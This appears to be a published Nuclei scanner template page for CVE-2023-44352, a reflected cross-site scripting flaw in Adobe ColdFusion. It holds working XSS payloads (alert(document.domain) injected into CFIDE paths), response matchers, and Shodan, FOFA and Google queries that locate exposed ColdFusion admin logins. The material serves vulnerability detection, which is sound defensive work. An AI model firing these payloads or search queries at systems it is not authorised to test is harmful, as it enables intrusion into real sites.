Adobe Coldfusion - Cross-Site Scripting
ID: CVE-2023-44352
Severity: medium
Author: pwnwithlove
Tags: cve,cve2023,coldfusion,adobe,xss
Description
Section titled “Description”Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser
YAML Source
Section titled “YAML Source”id: CVE-2023-44352
info: name: Adobe Coldfusion - Cross-Site Scripting author: pwnwithlove severity: medium description: | Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser reference: - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html - https://nvd.nist.gov/vuln/detail/CVE-2023-44352 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44352 cwe-id: CWE-79 epss-score: 0.00931 epss-percentile: 0.82639 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 8 vendor: adobe product: coldfusion shodan-query: - http.component:"Adobe Coldfusion" - http.component:"adobe coldfusion" - http.title:"coldfusion administrator login" - cpe:"cpe:2.3:a:adobe:coldfusion" fofa-query: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,coldfusion,adobe,xssvariables: string: "{{rand_base(8)}}"
http: - method: GET path: - '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm' - '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm' - '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm' - '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm' - '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm' - '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm' - '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm' - '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - 'action="/{{string}}"><img src=a onerror=alert(document.domain)>' - '"{{string}}"><script>alert(document.domain)</script>' condition: or
- type: dsl dsl: - "contains(body, 'ColdFusion')" - "contains(header, 'text/html')" condition: and# digest: 490a004630440220160d40dbb4287c19ef2e4d98119bf9b6a694cd8bbb5eaf5ac61e957637171ca7022025bc23a43f4bc5dea2ba3f34a067a7ee6f3106030c8777b545be2dd0532791cc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-44352.yaml"